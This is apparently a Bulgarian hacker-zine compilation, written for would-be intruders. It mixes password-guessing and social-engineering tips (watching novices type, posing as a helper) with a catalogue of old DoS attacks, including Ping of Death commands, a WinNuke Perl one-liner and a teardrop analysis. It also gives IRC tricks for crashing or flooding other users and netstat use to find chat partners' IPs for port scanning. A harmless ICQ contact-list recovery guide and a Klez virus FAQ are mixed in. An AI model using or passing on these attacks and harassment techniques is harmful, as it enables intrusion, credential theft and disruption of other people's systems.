Към концепцията за ключовите фрази е близка и концепцията за кодовата акронима, която експертите по защитата оценяват като кратка, но идеално безопасна форма на парола. В акронима ползвателят взима лесно запомнящо се предложение, фраза, ред от стихотворение и др. и използва първите думи на всяка дума в качеството на парола. Например акроним на двете приведени по-гора фрази се явява "wwtbt" и "fuon". Както виждате подобни нововъведения в теорията на паролите значително затруднява електронния шпионаж.
Шестият тип пароли - интерактивна последователност "въпрос - отговор", предлага на ползвателя да отговори на няколко въпроса, като правило от личния план: "Бащината фамилия на съпругата ти?", "Любимият ти цвят?" и др. В компютърът се съхраняват отговорите на много такива въпроси. При вход на ползвателя в системата компютърът сравнява полученият отговор с "правилния" сеансите за въпрос и отговор могат да се окажат примамливи за хакера, който е добре познат с ползвателя, от чието име той се опитва да влезне в системата. Системата с използване на въпрос - отговор може да прекъсне работата на ползвателя на всеки десет минути, предлагайки отговори на въпроси, които потвърждават неговото право да ползва системата. Това е много раздразнително, особено ако ползвателят е въвлечен в интересна игра. В днешно време такива пароли почти не се използват. Когато са ги измислили идеята е била доста добра, но дразнещия фактор на непрекъснатото прекъсване довел до това, че даденият метод почти излезнал от употреба.
"Строгите " пароли обикновено се използват съвместно с някакви външни електронни или механични устройства. В този случай компютърът с простодушно коварство предлага няколко варианта на покана и ползвателят е длъжен да им даде подходящи отговори. Този вид пароли често се среща в системи с еднократни кодови, а също и в параноидални организации.
Еднократните кодове са пароли, които сработват само веднъж. Към тях понякога се прибягва, създавайки временно копие за гостите, за да се демонстрират възможностите на системата на потенциалните клиенти. Те също понякога се прилагат при първото влизане на ползвателя в системата. По време на първия сеанс ползвателят въвежда своя собствена парола и при по-нататъшен вход в системата влиза с нея. Еднократните кодове могат също да се прилагат в дадена система, когато действителният ползвател влиза в нея за първи път, след което той сменя паролата си с по-секретен персонален код. В случаите когато системата се използва от група хора, но въпреки това не трябва да се нарушава секретността, се прибягва до списък с еднократни кодове. Който и да е ползвател въвежда код, съответното време, дата или ден от седмицата. Може да ви провърви и да намерите такъв списък в един от походите си, ровейки в боклука. Кодовете разбира се няма да ви потрябват, но пък ще разберете принципа на защита на дадената система.
Пароли, създавани от ползвателите
Болшинството пароли са от типа "направи си сам". Съвременните програма забраняват твърде кратките пароли, за да може проникването в системата да става по-трудно. Обикновено паролите съдържат не по-малко от 4-5 символа. Съществуват и други мерки, които не позволяват създаването на неудачни пароли. Например, системата може да настоява за това паролата включва в себе си малки и главни букви, съвместно с цифри. В различните ОС съществуват не малки програми, които преглеждат файловете, съдържащи пароли, анализират ги и определят тяхното ниво на секретност. Неподходящите пароли се заменят. Необходимо е поне бегло да се запознаете с тези програми, за да добиете представа какви да използвате на вашата система и какви пароли дадената програма не допуска. Като изключим гениите и безнадеждните идиоти, общо взето, всички хора взимат решение, мислят и действат горе-долу еднакво. Нужно е време, за да се научим да мислим творчески. Началните предположения и първите умозаключения при определени групи хора се оказват еднакви. Когато човек за пръв път пуска компютър и той му забранява паролата, тази парола се оказва вариант на една от общите и актуални за всички - особено ако на ползвателя не му стига времето или той се намира на непознато място. Представете си състоянието на човек, когато той се опитва да измисли собствената си секретна парола. Възможно е всяка минута от неговото забавяне да му струва някакви средства, или да го окуражава група от технически експерти, които обучават този човек на работа със системата. Както и да е, достатъчно е да се появи въпроса на екрана и човекът посвещава мислите си на това, че трябва незабавно нещо да измисли. Хората обикновено правят първото нещо, което им идва наум. А на ум им идва това, което те са виждали или слушали в дадения момент, или това, което са се канили да направят веднага след пускането на компютъра. Паролите обикновено се създават набързо, а замяната им с по-надеждни обикновено правим доста рядки. По такъв начин много пароли са извлечени направо от мислите ни, увлеченията ни, интересите ни. Ако ви се отдаде да отгатнете или узнаете една от подобните характеристики на пълноправен системен ползвател, вероятността да отгатнете вярната парола значително се покачва.
Вземете например каталозите на компаниите, хумористичните фотографии и всякаквите родове постери, красящи стените на офисите. Колко пъти ви се е налагало да виждате тиражирани фрази, като например: "не е наложително да сте кретен, за да работите тук… но да станете такъв няма да ви попречи!". Мога да ви уверя, че думата "кретен" се използва в качеството си на парола ежедневно. Не забравяйте също така и за врастта и начина на живот на средностатистически ползвател, под който вие се опитвате да се маскирате, за да проникнете и осъществите взлома. В офиса на която и да солидна фирма преди всичко няма да откриете плакат с някое голо маце, но в студенския град е напълно възможно да се използват пароли от типа на "playmate", "body" и др.
Най-простият начин да разбиеш парола е ти самия да влезнеш в системата в качеството на ползвател или да подскажеш паролата на ползвателя. Можеш да разиграеш пред някой новак ролята на компютърен гуру - да му разкажеш как стоят нещата като премълчиш аспекта на секретност и да се постараеш да узнаеш паролата му при въвеждането й. Новаците или на висок глас казват паролата или ще видите как очите им бляскат по календара на стената (редовно може да чуете нещо от рода на: "Господи, каква по-секретна парола да измисля? О, знам…" и със задоволство я изричат пишейки я по кравиатурата).
По-горе казаното е приятна случайност Обикновено, особено ако паролата е въведена до вашето идване, ви се налага доста да поработите, прибягвайки до методите на речников подбор, наблюдение на социален или технически методи за узнаване на паролата.
Болшинството от паролите са думи от литературата. Можете ли да си представите новак, седящ зад компютъра и старателно да въвежда в качеството на парола нещо от рода на: "fMp19Le"? естествено, че не!
Правилата за правописа на пароли няма: при създаването на пароли може да използвате собствени имена, думи с ортографически грешки, абревиатури, безсмислици и чужди термини. Тъй че, любителя на телевизионния сериал "Star Trek" може да създаде парола "enterprize" вместо коректния "Enterprise". Възможно е той (или тя) да не е много добър в граматиката, а и може така да му харесва повече. Важното е да знаете, че думи с грешки могат да бъдат пълноправни пароли. Може да намерите буква "к" вместо "с" - "kokakola", "x" вместо "ks" - "thanx" и други фонетични заместители.
Някои хакери преглеждат всяка дума в английския език докато не намерят някоя, която може да се ползва в качеството на парола. Ако паролата, която те търсят е често срещана дума, но неправилно написана, това може да ви коства доста време. Търсенето на пароли с помощта само на едно тъпо изброяване на думи от речника, не рядко се превръща в безполезно занимание. Много думи често срещат сред паролите. В това време други думи почти никога не се използват в качеството на такива. Мислите ли че някой е способен да въведе в качеството на парола наречие? Такива думи трябва да се обработват специално. Паролите по правило се отнасят към съществителните или към глаголите, е, понякога може да са и прилагателни. Сред паролите са популярни имена и прозвища на приятели и приятелки, тях лесно може да ги узнаете, нали?
Освен литературни думи се използват и имена на роднини, домашни животни, имена на улици, спортни отбори, продукти за хранене, важни дати и номера, номера на застраховки, рожденни дни и други паметни дати.
Срещат се също така и безсмислени символи и знаци от клавиатурата (kjkjkjkjkjkj, 7u7u7u7u, QWER, CCCC, 0987654321, asdfgh или azsxdc). Такива пароли обикновено представляват прост набор от повтарящи се или разположени един до друг символи на клавиатурата.
Типични грешки в TCP/IP стека
Nuke и SYN flood атаки
С думата Nuke се нарича всяка атака на портовете на отдалечен компютър, която довежда до крах на ОС и срив на интернет връзките. Nuke не нарушава състоянието на файловата система и не руши "желязото" на компютъра - презареждайки ОС user'ът може за продължи да работи в Мрежата.
nuke.c
Атаката не е получила широко разпространение, тъй като е могла да работи само на UNIX системи с права root, използвайки RAW_SOCKET. Идеята за тази атака се е състояла в това, че тя е изпращала неправилни ICMP пакети за недостижимост на отдалечения сървър и машината-хост и губила връзката.
Octopus
Унищожава всеки сървър, като го наводнява с TCP запитвания за връзка.
PingOfDeath
AIX, Digital Unix, Linux, BSDi, OSF, SCO
В ръководството на CERT се говори, че този бъг с превишаване размерите на IP-пакетите води до зависване и презареждане на системите. В действителност, ако се вярва на описаните резултати, тази dos атака действа само на Windows с WinQVT.
За да се осъществи тази атака, трябва да се пусне програма ping с параметри:
ping -l 65510 host.running.linux
или на машина win:
ping -l 65527 victim.dest.ip
Ping of Death основана на изпращането на повече от 65 527 байта данни + 20 байта IP-заглавки +8 байта ICMP-заглавки в един IP-пакет. С хитрост може да се постигне ефектен резултат - получените данни просто няма да се поместят в 16-битния вътрешен обмен, възниква непоправима грешка, която пречупва ОС.
WinNuke
blue screen or reboot on Winхх/NT
В средата на май 1997г. чрез тази атака за няколко дни бил изведен от строя www.microsoft.com. наред с обичайните данни, изпращани по TCP връзките, стандартът предвижда също предаване на извънредни (Out Of Band) данни. На ниво формат на пакетите TCP това се изразява в нулев urgent pointer. При повечето РС'та с установени Windows присъства мрежов протокол NetBIOS, услугите на който се осъществяват на 139 порт. Също често се среща MS DNS (53 поpт).
Както се изясни чрез експеримента, ако се включиш към Windows и по който и да е от подслушваните портове се изпратят няколко байта OutOfBand данни, реализацията на стека TCP/IP не знае какво да прави с тези данни и простичко машината увисва. Win попада в синия текстови екран, който съобщава за грешка в драйверите на TCP/IP и невъзможност за работа с мрежата до преинсталиране на ОС. NT без служба пакети се презарежда, а NT с SP2 попада също в синия екран.
Код за perl5.004
perl -MIO::Socket -e \
'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)'
С SP3 за WinNT и WinNuke се свързва доста весела история. Както се изяснило след пускането на SP3, стартирано от компютър Apple, WinNuke спокойно пробивал защитата на сървис пака. Съществуването на два различни стандарта на IP пакети, съдържащи OutOfBand, била причината. Има стандарт на Berkley и стандарт, описан в RFC 1122. Различията се състоят в това, че UrgentPointer се изчислява по различен начин. В действителност UrgentPointer в двете реализации се различава с единица. Третият сървис пак защитен от "свои" ООВ пакети, се оказва беззащитен срещу пакети от друг стандарт. Затова почти веднага след SP3 излязъл допълнителен ООВ fix.
Jolt / Sping
Зависват машини с Windows(OSR2), Memphis и Windows NT 4.0, които нямат firewall, блокиращи ICMP-пакетите. Също така това сработва и при машини със стара MacOS и стари реализации на System V.
Програмата се базира на стар код, който се използвал за "замразяване" работата на Unix System V. Тя изпраща серия от големи фрагментирани ICMP пакети, при приема на които машината безрезултатно се опитва да ги събере.
smurf / smurf for bsd
heavy flood of victims
Програмата е достатъчно примитивна. В нея в масив се указва списък с адреси, към които нееднократно се изпращат служебни съобщения за запитвания icmp_echo_request, изискващи отговор насочен към адреса на жертвата. В резултат на атаката, в зависимост от количеството на указаните адреси, жертвата получава мощен поток от съобщения, което за dual up ползвателите е равносилно на "моментална смърт".
Land
Affecting Windows (OSR2)/Windows NT 4.0/FreeBSD/HP-UX/OpenBSD/SunOS/ IOS (на нея работи с мрежовото оборудване на Cisco Systems).
Към жертвата се изпращат SYN пакети, в които IP адресът на източника и пункта на предназначение се указват равни с адреса на самата атакувана система (включително и еднаквите портове). Произтича зацикляне когато жертвата се опита да установи връзка сама със себе си, което в крайна сметка извежда машината извън строя. Портът естествено трябва да бъде открит.
Често атаките се комбинират. Например, Land & IP Spoofing: нападащата страна мигновенно провокира сървърът към обмен на съобщенията, но в качеството на обратен адрес се указва измислен. По такъв начин възниква полуоткрита връзка (half-open connections), при определени количества на които сървърът се указва просто не способен да открива нови. В болшинството случаи сървъри-жертви осезаемо забавят своята работа. Въпреки, че може да възникне аварийно презареждане на паметта. (Spoofing - подмяна на реалния адрес на отправителя с измислен. Като правило се използва в съчетание с различни видове атаки, за да не може жертвата да определи адреса на атакуващия.)
Latierra
Crashes Windows 95, and will cause Windows NT 4.0, SP3 to utilize a high percentage of CPU. In some instances, CPU usage reaches %100
Е модифицирана версия на land.c. изпраща практически същите пакети както и land, но едновременно на няколко порта. WinNT изобщо не го бърка дали е открит порта или не. NT с SP3 не позволява връзки към тези портове, но ако се манипулират различни портове, то реално може да се достигне нужния ефект.
teardrop / overdrop
Linux(kernel up to 2.0.31)/NT/95(OSR)
Оказва се, че Linux има сериозен bug във функцията за сбор на фрагменти ip_glue(). Когато системата събира IP фрагментите с построяване на оригиналната дейтаграма, се стартира цикъл за копиране на всички полезни фрагменти от получената дейтаграма в буфера.
От файла ip_fragment.c@376:
fp = qp->fragments; // указател на списъка на получените пакети
while(fp != NULL) // докато не са събрани всички нужни пакети
{
if(count+fp->len > skb->len) //ако дължината на фрагмента е твърде
{ // голяма, то той се отхвърля
error_to_big; // за да не копира ядрото твърде
} // много данни
memcpy((ptr + fp->offset), fp->ptr, fp->len);
count += fp->len;
fp = fp->next;
}
Както е видно тук не се осъществява проверка за твърде марка дължина на фрагмента, която също заставя ядрото да копира голям обем данни (в случай, че fp->len по-малко от 0).
За да узнаете кога това става, погледнете точките на добавяне в дейтаграмата по реда на обработка на сбора.
От файла ip_fragment.c@502:
// определяме позицията на фрагмента
end = offset + ntohs(iph->tot_len) - ihl;
И какво се получава, когато ние прекроим фрагмента :
От файла ip_fragment.c@531:
//Ние намерихме мястото, където да положим този фрагмент.
// Проверка на сравняване с предшестващия фрагмент,
// и, ако трябва, изравняваме, така че да се отстрани препокриването.
if (prev != NULL && offset < prev->end)
{
i = prev->end - offset;
offset += i; /* указател на дейтаграмата */
ptr += i; /* указател на фрагмента */
}
Ако открием, че текущото заместване на фрагмента е по-малко от края на предишния фрагмент (при сравнение), ни е необходимо да се опитаме да установим покриването. Всичко е ОК, ако съдържанието на текущия фрагмент съдържа достатъчно количество данни, за да превишава припокриването. В противен случай при смесването offset ще бъде по-голямо от end. Тези две значения се предават на функцията ip_frag_create(), в която се изчислява дължината на фрагмента (данните).
От файла ip_fragment.c@97:
//Запълваме структурата
fp->offset = offset;
fp->end = end;
fp->len = end - offset;
Това довежда към отрицателно значение на fp->len и функцията memcpy(), преведена по-нагоре ще грохне опитвайки се да копира твърде много данни, ще се пренатовари или увисне в зависимост от количеството.
Ние можем да провокираме такова нестандартно поведение по пътя на изпращане на две специално фрагментирани IP дейтаграми. Първата има нулево смесване на фрагмента с полезни данни и размер N, с установени MF битове "фрагментиран пакет" (съдържанието на данните не е важно). Вторият пакет се явява с последен флаг (MF равен на 0) с положително смесване по-малко от N и с данни по-малко от N.
Пример: две дейтаграми с размер 28 и 6 байта.
prev->end= 28 // дължина на първата
offset = 6; // смесване на втората
iph->tot_len = 6; // размер на данните на втората
end = offset + ntohs(iph->tot_len) - ihl; // end = 12
// проверка при налагането
if (prev != NULL && offset < prev->end)
{
i = prev->end - offset;
offset += i; /* указател на дейтаграмата */
ptr += i; /* указател на фрагмента */
}
// тук вече offset = 28, а end = 12 => ето и отрицателния резултат
bonk
Crashes *patched* win(OSR2)/NT 4.0 machines.
Използва открития UDP порт 55, който като правило е отворен на машините с установен IE.
Два щателно преработени IP пакета при сбор дават неправилна UDP дейтаграма. Налагането на смесването води до това, че във вторият пакет се презаписва по средата заглавката на първия по такъв начин, че дейтаграмата остава незавършена, паметта не се освобождава и в края на краищата се изчерпва. Windows NT отделя част от ядрото на паметта за съхранение на тези дейтаграми и може да зависне от съобщение STOP 0x0000000A след обработка на достатъчно повредени UDP пакети.
Майкрософт пуска не достатъчно изряден пач, който не напълно оправя тази грешка. Разплата за небрежността става нощта между 2 и 3 март 1998г., когато неизвестен злоумишленик изведе от строя хиляди Windows-машини в САЩ именно с такава атака. Сред пострадалите се оказаха и NASA и Масачузетския технологичен университет.
Newtear Модифицирана версия на teardrop'a
Affects patched NT4, and Win.
Основаваща се на същия принцип като TearDrop, newtear се явява нейно логично продължение: намалена е само реалната дължина на пакета, при което е увеличена логическата дължина (UDP).
syndrop доразработена за работа с TCP, в комбинация с SYN flood
boink
Концептуално по нищо не се отличава от bonk, просто се използват други портове. В програмата е добавена възможност за избор на диапазон на портове за bonk атака.
Fraggle
heavy flood of victims
продължението на идеята на smurf, довежда до образуването на прекалено голям трафик на жертвата, използвайки UDP протокол и 7 UDP порт (echo).
Nestea
Crashes linux 2.0.* and 2.1.* and some windows boxes
Използва лека модификация на идеята на teardrop'a за фрагментация на пакети при атака към открит UDP port: изпращане на три фрагментиране пакети.
Nestea2
Атаката е аналогична с nestea.c, само че са добавени опции за сканиране на подмрежа клас С.
Targa
Комбинира осем атаки в една:
bonk / jolt / land / nestea / newtear / syndrop
Фокуси с контактната листа (ICQ)
Уверен съм, че много от вас са се сблъсквали с такъв проблем като преинсталиране на ICQ. И също така съм уверен, че най-главната болка е да си възобновим сонтактната листа. Има такива моменти, когато преинсталирането на ICQ или смяната на UID е просто необходима. В това е и целта на тази статия, да ви избави от идиотизма на ръка да си прписвате всичките номера на вашите приятели.
И така, да разграничим няколко момента:
1.0 Възможно е самият Windows да е забил и от там да се налага преинсталиране на програмата. Мнозинството от вос просто биха премахнали папката C:\Progrsm Files\ICQ и отново инсталират програмата, след което регистрират предишния си номер и готово; но това не възстановява контактния лист. Какво може да се направи в този случай? Необходимо ви е да съхраните само една папка в зависимост от версията на ICQ (за ICQ98 - Db, за ICQ99а - newDB, за ICQ99b - Db99b - вел.ред. за по-новите версии такива маневри по принцип не се нала, ако директно каците върху старата инсталация по-нова версия, ако инсталирате същата, то тогава търсете папка, окончаваща на db). След като вече наново сте инсталирали ICQ и сте регистрирали своя предишен номер, изключете ICQ-то и просто заменете папките, за които говорехме по-горе и отново включете. О, чудо! Отново имате контактния лист
1.1 Да допуснем, че вашия мързел довежда до повторна регистрация или в настоящия момент нямате достъп до Интернет, а сте имали съобщения с паролата и логина за Интернет, а ICQ-то не трябва да се регистрира. А трябва да видим съобщението! Какво да направим? В този случай може да помогне програмата isoaqptr, ако не можете разбира се да ползвате регистър. В нея има специална функция, с която ние можем без проблем да въведем предишния си UIN в регистъра. Затова въведете в малкия прозорец своя стар номер и натиснете бутона на който пише: "Add this UID to the Registry". И това е всичко. Сега отново може да замените папката Db с вашата стара и всичко ще е ОК.
Трябва да отбележим, че може да копирате и други папки, като например: Received Files и Bookmark. Случват се такива моменти, в които просто регистрирате нов UIN. Причините могат да бъдат различни: откраднали са ви номера, опръзнало ви е да ви спамват или просто вие сте спамвали и от mirabilis просто са отделили вашия номер от базата си. Тогава и започва проблема.
2.0 При случай, когато просто е било необходимо да смените своя номер, а не по причина на кражба или отстраняване от базата данни, ще ви се наложи да ползвате програмата isoaqptr. Затова отидете в регистъра и натиснете бутона "Allow multiInstances" след което пуснете едновременно два пъти ICQ-то. Следващите ви действия са такива. Едното трябва да работи със стария ви номер, а другото с новия, естествено. В старото въведете в контакт листата вашия нов номер. След което към него на неголеми партиди използвайки функцията "Contacts", изпращате своя контакт лист. За всичко ще са ви нужни не повече от пет минути. Затова пък на новото ICQ няма да ви се наложи да чакате докато старите ви приятели ви дадат оторизация.
2.1 Е, сега имаме такъв случай, че вашето ICQ или са го откраднали или от mirabilis са ви шатнали. Остава ви да регистрирате нов номер и да чакате кога вашите приятели ще ви се обадят. Но това чакане едва ли ще ви доведе до резултат! Е, като че ли друг изход няма! Не, все пак има! Наистина той не е много прост и трябва много внимателно да се подходи. Започваме подред.
И така, най напред копирайте вашата Db папка два пъти, ще ви потрябва в случай, че нещо сгафите. Едното копие ще бъде оригиналното, а с двете други ще работите. Да допуснем, че вашия номер е бил 56478219, станал е гафът и сте си регистрирали номер67654321.
Да предположим, че имате ICQ99а или ICQ99b (за остонолите е аналогично, но трябва малко да се помисли). В нашата Db папка ще се намират следните файлове:
56478219.dat
56478219.idx
56478219.msg
56478219tmp.dat
56478219tmp.idx
това е за старото ICQ
7654321.dat
67654321.idx
67654321.msg
67654321tmp.dat
67654321tmp.idx
и за новото ICQ
За да възстановим стария контакт лист и всички съобщения ще ни трябва само файл56478219.dat!
Още един път повтарям направете копие на вашата Db папка.
Сигурно мнго от вас вече са се опитвали просто да преименуват файла, да му придадат номера на новия UIN, но нищо не е станало. Да, няма така да ви се отдаде да пуснете ICQ с преименования файл Ще изскочи аплет на който пише, че вашата база е повредена. Причината е в това, че в този файл има запис 16-тичен код, че вошият номер е ICQ 56478219, а не 67654321 и при несъвпадение изскача аплета. В това е и проблемът. Следва изводът, че трябва да се измени кода. Затова се възползваме от инжинерния калкулатор, който се намира в Windows. Въвеждаме номера 56478219 в десетичен режим и го превеждаме в 16-тичен режим (Нех). Получава се следното изражение: 35DCA0B. Няма да навлизаме в подробности защо и как, трябва да намерите рад във вашия файл с фрагмент"0B CA 5D 03". Тоест след като вече сте превели в 16-тична система изчисленията ви е необходимо да разбиете изражението по два знака и да ги напишете в обратен порядък. В този случай ако се е получило изражение с нечетно количество знаци, то в самото начало добавете 0. Пример: Uin: 65761812; значението на калкулатора е: 3EB7214; добавяме 0 и разбиваме по двойки: 03 EB 72 14; пишем в обратен ред: 14 72 EB 03.
Сега правим същото и с новия UIN. Той беше 67654321. Превеждаме го в 16-тичен код, разбиваме по двойки, преписваме в обратен порядък и се получава: B1 52 08 04. После взимате кои и да е дизасемблер и отваряме нашия файл 56478219.dat, търсим фрагмента 0B CA 5D 03 и го заменяме с B1 52 08 04. Такива фрагменти има 3-4. Всички преправете и съхранете измененията. После придайте на преправиния файл със стария UIN името на новия. Тоест отстранете в копираната папка Db всички файлове, причастни към новия UIN и применувайте файла така, че при него в названието да бъде UIN' на новото ICQ. Надявам се, че разбрахте. После преместете преименувания файл в главната папка Db, предварително отстранете от нея файловете отнасящи се до новия UIN и стартирайте ICQ. Ако сте направили всичко правилно, то при стартирането на новия UIN ще бъде целият ваш контактен лист. И така да повторим казаното до тук:
Правим две копия на Db папката.
Превеждаме двата си UIN'а в 16-тичен код.
1. Преправяме с дизасемблера вътрешния код на dat файла отговарящ на стария номер, след което го преименуваме така все едно той се отнася за новия UIN.
2. Копираме преправения файл в главната папка.
3. Стартираме ICQ.
Надяваме се че всичко беше достатъчно просто обяснено
IRC
Ще разгледам един случай в IRC. Ще слагам # при коментарите ми. И така:
# нищо не става /затворен 7-ми port/…
# след малко goshko почва да ми проверява version, time, ping… почва да ме дразни…
# продължава…
#охо...сега ще умре
goshko quit from chanel (connection reset by peer)
#след 20 секунди влиза
# повтарям процедурата и ефектът е същия - клиентът му забива. Някои по-стари IRC имат bug - като се появи nick com1, com2…lpt, etc съобщението се праща директно към port'a и той блокира при отговор… Ако към com'а е вързана мишката, тя блокира, ако е модема - disconnect'ва се, ако е принтер - спира да работи… Толкова за това.
Случвало ли ви се е в IRC някой да ви дразни и да нямате правата или възможността да го kick'нете???… Спокойно има начин да го изкарате. Отворете някой *.txt file /около 15-20К/, следва copy, paste нa private /не се притеснявайте ако ви disconnect'не от server'а - това е нормално, просто се connect'вате веднага и пак paste…/. След 4-5 такива упражнения въпросната персона ще загине…
Някои хитреци си настройват irc клиента да праща съобщения при ignore на всеки получен message. Да речем, че сте ignore'нали goshko… на всяка негова реплика към вас вие му пращате съобщение, че е ignore'нат /съобщението е между 30-80b/. DoS атаки!!! почнете да му пращате "." /точка -->enter, точка -->enter… etc/ значи на всеки пратени от вас 2b той изпраща 10-20 пъти повече… това си е жив flood и може сериозно да го затормозите.
Netstat
Използването на netstat-а:
за да използвате netstat-а трябва да отворите DOS prompt-а (Start->Programs->MS-DOS Prompt). Netstat е много полезно приложение. Често се използва за да вземете IP-то на някой с когото си чатите. Може да погледате и собствените си портове за да видите стават ли някакви мизерии там.... Значи ето ви едно примерче.... отваряме dos prompt-а и пишем netstat:
C:\WINDOWS>netstat
Active Connections
Proto Local Address Foreign Address State
TCP w9i2t4:1131 i.dirbg.com:80 TIME_WAIT
TCP w9i2t4:1136 ads.dir.bg:80 TIME_WAIT
TCP w9i2t4:1138 i.dirbg.com:80 TIME_WAIT
TCP w9i2t4:1139 ads.dir.bg:80 TIME_WAIT
TCP w9i2t4:1143 205.188.2.9:5190 ESTABLISHED
Погледнете примера. Това Proto показва какъв протокол се използва. След него е Local Address. Там виждате локалния IP/името на хоста : отворения порт. След това е Foreign Address - оня с който си комуникирате в момента, неговия IP/име на хоста и порта, през който се осъществява връзката. В случая осъществяваме връзка към dir.bg през порт 80 (HTTP). Най-накрая е State, което показва състоянието на връзката. Това беше основното, сега ще се задълбочим малко.
Намиране на отворени портове:
ако сте забелязали нещо странно в поведението на вашия компютър напоследък и искате да проверите дали някой не галопира в PC-то ви. Ето как можете да засечете евентуален троянски кон. Отваряме dos prompt-а и пишем:
C:\WINDOWS>netstat ? (искаме малко повече информация за netstat-а)
показва протоколите и настоящите TCP/IP връзки
NETSTAT [-a][-e] [-n] [-s] [-p proto] [-r] [interval]
-a показва всички връзки и портове
-e показва Ethernet статистиките, може да се комбинира със -s
-n показва адреса и номера на порта
-p porto показва протоколите, които може да са TCP или UDP. Ако се използва със -s протоколите могат да са TCP, UDP или IP
-r какво ли пък е тфа?
-s показва статистиката на даден протокол. По принцип статистика се показва за TCP, UDP и IP.
interval подновява показаното (refresh), спира се с Ctrl + C
Най-добре е да използвате C:\Windows\netstat -an, което показва всички връзки и отворени портове. Това е все едно пишем netstat -a-n, само че си спестяваме едно тире :> Ако знаете портовете използвани от троянци търсите такива. Ако не ги знаете отивате на адрес http://free.bol.bg/bgxak/trojan_ports.txt, дърпате го тоя списък и там са дадени портовете на повечето троянци. Ако имате такъв отворен порт значи някой пасе у вас!
Искате ли да видите на някой IP-то, който е в ICQ? Ето как става най-лесно:
преди да започнете да си говорите с оня дето от другата страна на ICQ-то отидете в dos prompt-а и напишете netstat -n за да ви бъдат изведени всички IP-та, с които имате връзка в момента. Запишете си ги някъде. Сега изпратете някакво съобщение до оня с който си чатите и бързо напишете в dos prompt-а netstat -n. И вече трябва да имате добавено ново IP в листата. Намирате кое е то и това е неговото IP.
За какво друго се използва:
можете да вземете IP на всичко, с което имате връзка в момента (директни съобщения, трансфер на файлове, чат по ICQ, AIM, DCC, IRC и къде ли още не.....!). Можете да сканирате взетото IP с някой порт скенер за отворени портове. А като намерите такива вече темата става за друга статия.
Ами това е май.... е наистина има много направени инструменти за взимане на IP-та от ICQ, IRC и т.н., но е много добре ако се научите да го правите ръчно! Без помощта на някакви "хакерски" програмки. Така ще разберете по-добре структурата на нета, ще ви зареди с нови идеи и ще пребори мързела у вас!
oho-boho
FAQ
Вируси
? Намерих това Klez.E в inbox'а си. Широко разпространен вирус ли е или…?
• Вероятно става въпрос за Win32/Klez.E, макар че да се направи точна диагноза само по това описание не е най-правилния начин… Ако става въпрос за Klez.E, тогава отговорът е - да, широко разпространен е.
Win32/Klez.E е вирус "измама". Той често изпраща съобщение, като: "My previous message was infecetd with a virus -- please run the attached program to clean your machine". Нещо, което ако направите, със сигурност ще се заразите с вирус.
? В действителност заглавието на съобщението показва, че то не идва от нашия собствен сървър. Води началото си от кабелния модем на user'ската машина и е доставено по кабелен ISP mail сървър (те блокират директния достъп на user'ите до порт 25). Адресът на e-mail'а е в Return-Path (!), но х'ът е като неговия IP адрес.
• Този вирус не прави опит за "порядъчна" подмяна на битовете в заглавката на съобщението. Това би било безсмислено, тъй като винаги се стартира от обикновена user'ска машина с проста dial-up или cable/DSL връзка. Ако се опита да е толкова "хитър" в тази ситуация, може да се обзаложим, че mail wizards би могъл да сътвори procmail филтър за откриване на неговите фалшификации…
О, и не вярвайте на редовете отбелязнащи user'ското ID на върнатите съобщения. Това, разбира се, е доставено от вируса и може да бъде всеки един адрес, така както и вашият адрес може да бъде намерен и избран като мишена за адререс на такъв вид съобщения (като казвам вашия адрес, имам пред вид адрес от вида info@, той може да бъде на същото място в друго съобщение изпратен от тази машина). ISP'тата наистина трябва да помислят по въпроса: да пренапишат header'ите или да прибавят X- header, който да осигурява повече идентификационна информация. Например, ако съобщение е поставено от dial-up/cable/DSL user, то ISP'то трябва да може лесно да свърже информацията за собственика на account и IP'то като редовна форма от accounts и e-mail адреси, но не му е мястото тук да обсъждаме тази тема…
Все повече вируси събират адреси на жертвите си от Temporary Internet Files папка и/или от някакви HTML файлове, които те могат да намерят на машината. Подозирам, че създателите на вируси са наясно с нарастващия брой Outlook инсталации с пачовете и версиите, които пречат за редовен достъп до адресната книга и разбира се фактът, че относително малко home user'и имат Outlook. Тъй като home user'ите са тези, които осигуряват по-голяма сфера на self mailer'ите да се разпространяват, това подсказва на създателите, че нещата трябва да се променят, за да работят по-оптимално в средата, в която виреят.
? Добре, това го разбрах. В съобщението се казва "The attachment is the original mail". Сигурно е така. Атачмънът е 81088 байта W32 изпълним, наречен href.exe.
• Това разбира се е силна улика, че съобщението е Klez... вирус.
? Стритгът показва, че е написан на MSVC++ и открива също следното:
QUIT
DATA
HELO %s
MAIL FROM: <
RCPT TO:<
• И това. Почти всички "тревожни" стрингове в Klez (включително и тези, които издават съобщението, което получи) са шифровани в ЕХЕ и се разшифроват, когато вирусът се стартира. Тези няколко SMTP команди са единствения видим стринг в ЕХЕ отделно от обикновените неща генериране от компилатори като API, РЕ и др.
? Излиза, че да имаш SMTP клиент означава зло?
• Да, определено
? Това добре! Но има някои неща, които не разбирам тук. Не прилича на това ехе, което е поставено на горния mail. Не мога да намеря никакъв съответен стринг, например там няма "postmaster", "subject" или "attachment".
• Грешен инструмент. Трябва ти дизасемблер и/или debugger…
? Атачмънтът, като такъв е ясно, че е злонамерен, но той не е вектор. Или има два различни вектора или каква?
• Първото ти твърдение е вярно, но второто - не. Атъчмънтът е корие на вектора.
? Също има X-Mailer в mail header'а, което одначава, че не е изпратен от Outlook или някой друг известен mail клиент, а вероятно от самия вирус?
• Много правилно.
? …Тагава какво прави "return path'ът" тук? E-mail'ът е на HTML и е MIME-кодиран. Изглежда, че ще има доста трудности вирусът, който се опитва чрез "социална инженерия" да те накара да кликнеш на атачмънта?
• Да, но IIRC също използва един от autodetach-and-run експлоитите, които се отнасят за различните версии IE, което обеснява защо има HTML… Ако то пристигне на не уязвима машина, все още има шанс да се стартира, чрез успеха на проведената социална инженерия.
Тук е момента да се запитаме за какво са добрите скенери за вируси? Те могат да ви покажат името, фамилията и варианта на вирус и след това, ако е от познатите, може лесно да се намери описанието му в AV търговски web сайтове.
? Заразен съм с W32.Klez.E@mm вирус. Следвах внимателно инструкциите по отстраняването, но не работи коректно. Вирусът все още се появява от време на време…
• Това би могло да бъде защото машината има open shares или share, на който друга станция или user има достъп. Колкото дълго този дял е отворен и имате заразена машина във вашата мрежа, толкова дълго тази станция ще заразява сървъра с open shares отново и отново. Под заразяване отново се разбира опит да се копира на този отворен дял заразения файл (най-вероятоно сървърът няма да стане активно заразен, при положение, че ивате антивирусна програма).
Трябва да намерите компютъра или компютрите, които се опитват да заразят отново другите машини в мрежата.
